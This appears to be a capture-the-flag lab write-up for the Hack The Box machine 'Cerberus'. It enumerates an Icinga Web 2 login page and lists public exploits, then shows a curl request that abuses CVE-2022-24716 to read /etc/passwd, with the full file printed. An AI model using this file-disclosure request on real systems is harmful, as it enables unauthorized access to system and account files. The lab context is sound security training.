InfoSec LAB

Cerberus_Web_8080

Created: 3 min read

Web

Nmap discovered a Web server on the target port 8080 The running service is Apache httpd 2.4.52 ((Ubuntu))

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ curl -i http://$IP:8080/
HTTP/1.1 302 Found
date: Wed, 17 Jan 2024 07:15:23 GMT
server: Apache/2.4.52 (Ubuntu)
location: http://icinga.cerberus.local:8080/icingaweb2
content-length: 0
content-type: text/html; charset=UTF-8

the target web server responses with 302 to http://icinga.cerberus.local:8080/icingaweb2

The domain information has been appended to the /etc/hosts file on Kali for local DNS resolution

  • This discovery is rather confusing since the target system is also suspected to be a Domain Controller in an Active Directory environment.
  • The web host, icinga.cerberus.local, will be queried against the DNS server

Webroot Redirected to a login page of Icinga Now, this suggests what the web host is named after

Icinga

Icinga is an open-source computer system and network monitoring application. It was originally created as a fork of the Nagios system monitoring application in 2009. It provides a flexible and extensible platform for monitoring diverse IT environments, offering real-time status updates and notifications. Icinga supports both active and passive checks, allowing users to customize monitoring configurations to suit their specific needs.

Icinga is primarily used for monitoring and managing the health, performance, and availability of IT infrastructure components such as servers, networks, and applications. It is commonly employed in enterprise environments and data centers to proactively identify issues, generate alerts, and ensure the continuous operation of critical systems. Icinga’s flexibility and support for various plugins make it suitable for diverse use cases, allowing users to tailor monitoring configurations to their specific requirements.

Vulnerability

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ searchsploit icinga        
----------------------------------------------------------------------- ---------------------------------
 Exploit Title                                                         |  Path
----------------------------------------------------------------------- ---------------------------------
Icinga - cgi/config.c process_cgivars Function Off-by-One Read Remote  | cgi/dos/38882.txt
Icinga Web 2.10 - Arbitrary File Disclosure                            | php/webapps/51329.py
Icinga Web 2.10 - Authenticated Remote Code Execution                  | php/webapps/51586.py
----------------------------------------------------------------------- ---------------------------------
shellcodes: No Results
papers: No Results

It would appear that Icinga has a history of having some vulnerabilities with published exploits

about the same result can be seen online as well While the version information has not been identified at the time of writing, it is worth checking for one of the recent vulnerabilities as corresponding public exploits are available for that; [[Cerberus_CVE-2022-24716#[CVE-2022-24716](https //nvd.nist.gov/vuln/detail/CVE-2022-24716)|CVE-2022-24716]] and [[Cerberus_CVE-2022-24715#[CVE-2022-24715](https //nvd.nist.gov/vuln/detail/CVE-2022-24715)|CVE-2022-24715]]

┌──(kali㉿kali)-[~/archive/htb/labs/cerberus]
└─$ curl http://icinga.cerberus.local:8080/icingaweb2/lib/icinga/icinga-php-thirdparty/etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
_apt:x:100:65534::/nonexistent:/usr/sbin/nologin
systemd-network:x:101:102:systemd Network Management,,,:/run/systemd:/usr/sbin/nologin
systemd-resolve:x:102:103:systemd Resolver,,,:/run/systemd:/usr/sbin/nologin
messagebus:x:103:104::/nonexistent:/usr/sbin/nologin
systemd-timesync:x:104:105:systemd Time Synchronization,,,:/run/systemd:/usr/sbin/nologin
pollinate:x:105:1::/var/cache/pollinate:/bin/false
usbmux:x:107:46:usbmux daemon,,,:/var/lib/usbmux:/usr/sbin/nologin
matthew:x:1000:1000:matthew:/home/matthew:/bin/bash
ntp:x:108:113::/nonexistent:/usr/sbin/nologin
sssd:x:109:115:SSSD system user,,,:/var/lib/sss:/usr/sbin/nologin
nagios:x:110:118::/var/lib/nagios:/usr/sbin/nologin
redis:x:111:119::/var/lib/redis:/usr/sbin/nologin
mysql:x:112:120:MySQL Server,,,:/nonexistent:/bin/false
icingadb:x:999:999::/etc/icingadb:/sbin/nologin

Vulnerable There is the matthew user that was found during enumerating the KDC earlier

Interactive Graph View

Backlinks